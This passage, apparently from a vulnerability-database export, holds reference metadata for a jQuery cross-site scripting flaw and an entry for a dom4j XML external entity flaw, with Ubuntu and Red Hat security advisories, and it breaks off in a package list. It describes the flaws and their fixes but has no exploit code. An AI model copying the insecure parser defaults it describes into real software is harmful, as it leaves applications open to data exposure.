trust: 1.7, url: 
"https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44601", }, { trust: 1.7, url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, { trust: 1.7, url: "https://www.tenable.com/security/tns-2019-08", }, { trust: 1.7, url: "http://seclists.org/fulldisclosure/2019/may/13", }, { trust: 1.7, url: "http://seclists.org/fulldisclosure/2019/may/11", }, { trust: 1.7, url: "http://seclists.org/fulldisclosure/2019/may/10", }, { trust: 1.7, url: "https://github.com/jquery/jquery/issues/2432", }, { trust: 1.7, url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { trust: 1.7, url: "https://snyk.io/vuln/npm:jquery:20150627", }, { trust: 1.7, url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { trust: 1.7, url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { trust: 1.7, url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { trust: 1.7, url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { trust: 1.7, url: "https://access.redhat.com/errata/rhsa-2020:0729", }, { trust: 1.7, url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { trust: 1.3, url: "https://nvd.nist.gov/vuln/detail/cve-2015-9251", }, { trust: 1, url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3cdev.flink.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3cuser.flink.apache.org%3e", }, { trust: 1, url: 
"https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3cuser.flink.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3ccommits.roller.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3cuser.flink.apache.org%3e", }, { trust: 0.9, url: "https://jquery.org/", }, { trust: 0.8, url: "https://jvn.jp/vu/jvnvu96012689/", }, { trust: 0.8, url: "https://www.us-cert.gov/ics/advisories/icsa-18-212-04", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3cdev.flink.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3cuser.flink.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3cuser.flink.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3cuser.flink.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3ccommits.roller.apache.org%3e", }, { trust: 0.6, url: 
"https://www.ibm.com/support/pages/node/1105515", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/1105509", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/1105479", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/1106577", }, { trust: 0.6, url: "http://www.ibm.com/support/docview.wss?uid=ibm10874666", }, { trust: 0.6, url: "https://fortiguard.com/psirt/fg-ir-18-013", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10967469", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-a-cross-site-scripting-vulnerability-in-jquery-affects-ibm-infosphere-information-server/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159353/red-hat-security-advisory-2020-3936-01.html", }, { trust: 0.6, url: "https://www-01.ibm.com/support/docview.wss?uid=ibm10878200", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-swagger-ui-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilites-affect-ibm-jazz-foundation-and-ibm-engineering-products-5/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2019.4294/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-and-vulnerable-library-jquery-v1-11-1-affects-ibm-engineering-workflow-management/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-swagger-ui-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm-2/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2021.0465", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/156630/red-hat-security-advisory-2020-0729-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/78866", }, { trust: 0.6, url: 
"https://packetstormsecurity.com/files/156941/red-hat-security-advisory-2020-0983-01.html", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/1105497", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3875/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.1016/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2021.1519", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3902/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.0832/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/170821/red-hat-security-advisory-2023-0552-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2023.0585", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159852/red-hat-security-advisory-2020-4847-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2021.2525", }, { trust: 0.6, url: "http://www-01.ibm.com/support/docview.wss?uid=ibm10874666", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities-10/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities-8/", }, { trust: 0.6, url: "https://us-cert.cisa.gov/ics/advisories/icsma-21-187-01", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2023.0583", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-qradar-analyst-workflow-add-on-to-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities-2/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerability-issues-affect-ibm-spectrum-symphony-7-3-1/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/79122", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.0494/", }, { trust: 0.6, url: 
"https://www.auscert.org.au/bulletins/78794", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/156315/red-hat-security-advisory-2020-0481-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3267/", }, { trust: 0.6, url: "https://us-cert.cisa.gov/ics/advisories/icsa-22-097-01", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.1076/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3368/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/170823/red-hat-security-advisory-2023-0553-01.html", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-3/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2019.3165/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2022.1512", }, { trust: 0.5, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2015-9251", }, { trust: 0.5, url: "https://bugzilla.redhat.com/):", }, { trust: 0.4, url: "https://access.redhat.com/security/updates/classification/#important", }, { trust: 0.3, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14040", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2018-14040", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14042", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2020-11022", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2016-10735", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2019-11358", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2016-10735", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2020-11022", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2019-8331", }, { trust: 0.3, url: 
"https://access.redhat.com/security/cve/cve-2018-14042", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2019-8331", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11358", }, { trust: 0.3, url: "https://access.redhat.com/articles/11258", }, { trust: 0.3, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-11023", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-40150", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-3143", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-42003", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-42004", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14041", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40150", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-45047", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2017-18214", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40152", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40149", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-40149", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-11023", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-40152", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2018-14041", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2017-18214", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-45693", }, { trust: 0.2, url: 
"https://access.redhat.com/security/cve/cve-2022-46364", }, { trust: 0.2, url: "https://issues.jboss.org/):", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-3143", }, { trust: 0.2, url: "https://listman.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2019-10174", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10174", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2023:0554", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2023:0553", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.amq.broker&downloadtype=securitypatches&version=6.3.0", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.fuse&downloadtype=securitypatches&version=6.3", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_fuse/6.3/html/release_notes/index", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1722", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-20676", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1722", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-20676", }, { trust: 0.1, url: "https://access.redhat.com/security/updates/classification/#moderate", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-20677", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:4670", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-20677", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9513", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9514", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9517", }, { trust: 0.1, url: 
"https://access.redhat.com/security/cve/cve-2019-10184", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-14379", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9515", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-11771", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-5427", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9512", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9514", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-12422", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-3888", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9517", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9515", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-5929", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-12422", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-14439", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9516", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9518", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11272", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.6/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-17570", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-3888", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9513", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-17570", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product=jboss.fuse&version=7.6.0", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-5929", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-11771", }, { trust: 0.1, url: 
"https://access.redhat.com/security/cve/cve-2019-14439", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-3802", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-12814", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9512", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10184", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-12384", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-15756", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-5427", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-15756", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-16012", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-12384", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-11272", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9516", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-3802", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-12814", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9518", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-16012", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:0983", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-14379", }, ], sources: [ { db: "VULHUB", id: "VHN-87212", }, { db: "BID", id: "105658", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "PACKETSTORM", id: "170819", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "156315", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "156941", }, { db: "CNNVD", id: "CNNVD-201801-798", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-87212", }, { db: "BID", id: "105658", 
}, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "PACKETSTORM", id: "170819", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "156315", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "156941", }, { db: "CNNVD", id: "CNNVD-201801-798", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2018-01-18T00:00:00", db: "VULHUB", id: "VHN-87212", }, { date: "2018-01-18T00:00:00", db: "BID", id: "105658", }, { date: "2018-02-16T00:00:00", db: "JVNDB", id: "JVNDB-2015-008097", }, { date: "2023-01-31T17:19:24", db: "PACKETSTORM", id: "170819", }, { date: "2023-01-31T17:26:38", db: "PACKETSTORM", id: "170823", }, { date: "2020-02-12T18:53:35", db: "PACKETSTORM", id: "156315", }, { date: "2020-11-04T15:32:52", db: "PACKETSTORM", id: "159876", }, { date: "2020-03-27T13:16:40", db: "PACKETSTORM", id: "156941", }, { date: "2018-01-22T00:00:00", db: "CNNVD", id: "CNNVD-201801-798", }, { date: "2018-01-18T23:29:00.307000", db: "NVD", id: "CVE-2015-9251", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2021-01-08T00:00:00", db: "VULHUB", id: "VHN-87212", }, { date: "2019-07-17T07:00:00", db: "BID", id: "105658", }, { date: "2021-07-08T08:40:00", db: "JVNDB", id: "JVNDB-2015-008097", }, { date: "2023-02-02T00:00:00", db: "CNNVD", id: "CNNVD-201801-798", }, { date: "2024-11-21T02:40:09.093000", db: "NVD", id: "CVE-2015-9251", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "CNNVD", id: "CNNVD-201801-798", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: 
{ "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "jQuery Cross-site Scripting Vulnerability", sources: [ { db: "JVNDB", id: "JVNDB-2015-008097", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "xss", sources: [ { db: "PACKETSTORM", id: "156315", }, { db: "CNNVD", id: "CNNVD-201801-798", }, ], trust: 0.7, }, }
var-202005-1054
Vulnerability from variot
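dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j. dom4j is an open source framework for processing XML. The vulnerability exists in dom4j versions prior to 2.0.3 and 2.1.x versions prior to 2.1.3, and stems from an insecure default in the library's XML parser configuration: unless the application overrides it, the parser resolves external DTDs and external entities in the XML it reads. Applications that parse untrusted XML and cannot yet move to a fixed release can, on Xerces-based parsers, set the SAX feature `http://apache.org/xml/features/disallow-doctype-decl` to true on the reader, or, where DTDs are required, set `http://xml.org/sax/features/external-general-entities` and `http://xml.org/sax/features/external-parameter-entities` to false.
==========================================================================
Ubuntu Security Notice USN-4575-1 October 13, 2020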
dom4j vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
Summary:
dom4j could be made to expose sensitive information or run programs if it received specially crafted input.
Software Description: - dom4j: Flexible XML framework for Java
Details:
It was discovered that dom4j incorrectly handled reading XML data. A remote attacker could exploit this with a crafted XML file to expose sensitive data or possibly execute arbitrary code. (CVE-2020-10683)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libdom4j-java 1.6.1+dfsg.3-2ubuntu1.1
In general, a standard system update will make all the necessary changes.
Description:
Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 7.3.2 security update
Advisory ID: RHSA-2020:3461-01
Product: Red Hat JBoss Enterprise Application Platform
Advisory URL: https://access.redhat.com/errata/RHSA-2020:3461
Issue date: 2020-08-17
CVE Names: CVE-2019-14900 CVE-2020-1710 CVE-2020-1748 CVE-2020-10672 CVE-2020-10673 CVE-2020-10683 CVE-2020-10687 CVE-2020-10693 CVE-2020-10714 CVE-2020-10718 CVE-2020-10740 CVE-2020-14297
=====================================================================
- Summary:
An update is now available for Red Hat JBoss Enterprise Application Platform 7.3 for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss EAP 7.3 for RHEL 6 Server - noarch
- Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
This release of Red Hat JBoss Enterprise Application Platform 7.3.2 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.3.1, and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.3.2 Release Notes for information about the most significant bug fixes and enhancements included in this release.
Security Fix(es):
- wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API (CVE-2020-10718)
- dom4j: XML External Entity vulnerability in default SAX parser (CVE-2020-10683)
- wildfly-elytron: session fixation when using FORM authentication (CVE-2020-10714)
- wildfly-undertow: Undertow: Incomplete fix for CVE-2017-2666 due to permitting invalid characters in HTTP requests (CVE-2020-10687)
- jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10673)
- hibernate-core: hibernate: SQL injection issue in Hibernate ORM (CVE-2019-14900)
- wildfly: unsafe deserialization in Wildfly Enterprise Java Beans (CVE-2020-10740)
- jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10672)
- undertow: EAP: field-name is not parsed in accordance to RFC7230 (CVE-2020-1710)
- hibernate-validator: Improper input validation in the interpolation of constraint error messages (CVE-2020-10693)
- wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain (CVE-2020-1748)
- wildfly: Some EJB transaction objects may get accumulated causing Denial of Service (CVE-2020-14297)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, see the CVE page(s) listed in the References section.
- Solution:
Before applying this update, ensure all previously released errata relevant to your system have been applied.
For details about how to apply this update, see:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1666499 - CVE-2019-14900 hibernate: SQL injection issue in Hibernate ORM
1694235 - CVE-2020-10683 dom4j: XML External Entity vulnerability in default SAX parser
1785049 - CVE-2020-10687 Undertow: Incomplete fix for CVE-2017-2666 due to permitting invalid characters in HTTP requests
1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230
1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages
1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain
1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution
1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution
1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication
1828476 - CVE-2020-10718 wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API
1834512 - CVE-2020-10740 wildfly: unsafe deserialization in Wildfly Enterprise Java Beans
1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-18793 - GSS Upgrade Hibernate ORM from 5.3.16 to 5.3.17 JBEAP-19095 - GSS Upgrade wildfly-http-client from 1.0.20 to 1.0.21 JBEAP-19134 - (7.3.z) Upgrade HAL from 3.2.8.Final-redhat-00001 to 3.2.9.Final JBEAP-19185 - (7.3.z) Upgrade IronJacamar from 1.4.20.Final to 1.4.22.Final JBEAP-19203 - (7.3.z) WFCORE-4850 - Updating mockserver to 5.9.0. Exclusion of dependency from xom.io7m JBEAP-19205 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.x JBEAP-19269 - GSS Upgrade jboss-logmanager from 2.1.14.Final to 2.1.15.Final JBEAP-19322 - (7.3.z) Upgrade XNIO from 3.7.7 to 3.7.8.SP1 JBEAP-19325 - (7.3.z) Upgrade Infinispan from 9.4.18.Final-redhat-00001 to 9.4.19.Final-redhat-00001 JBEAP-19397 - (7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP09-redhat-00001 to 2.3.9.SP11-redhat-00001 JBEAP-19409 - Tracker bug for the EAP 7.3.2 release for RHEL-6 JBEAP-19529 - (7.3.z) Update PR template to include PR-processor hints. JBEAP-19564 - GSS Upgrade jboss-ejb-client from 4.0.31.Final-redhat-00001 to 4.0.33.Final-redhat-00001 JBEAP-19585 - GSS Upgrade org.jboss.genericjms from 2.0.4 to 2.0.6 JBEAP-19617 - (7.3.z) Upgrade wildfly-naming-client from 1.0.12.Final-redhat-00001 to 1.0.13.Final-redhat-00001 JBEAP-19619 - (7.3.z) Upgrade JBoss JSF API from 3.0.0.SP02-redhat-00001 to 3.0.0.SP04-redhat-00001 JBEAP-19673 - (7.3.z) [WFCORE] Upgrade WildFly Common to 1.5.2.Final JBEAP-19674 - (7.3.z) [WFCORE] Upgrade galleon and wildfly-galleon-plugins from 4.1.2.Final to 4.2.4.Final JBEAP-19874 - GSS Upgrade wildfly-http-client from 1.0.21.Final-redhat-00001 to 1.0.22.Final-redhat-00001
- Package List:
Red Hat JBoss EAP 7.3 for RHEL 6 Server:
Source: eap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.src.rpm eap7-elytron-web-1.6.2-1.Final_redhat_00001.1.el6eap.src.rpm eap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.src.rpm eap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.src.rpm eap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.src.rpm eap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.src.rpm eap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.src.rpm eap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.src.rpm eap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-jaxrs-providers-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.src.rpm eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.src.rpm eap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.src.rpm eap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.src.rpm 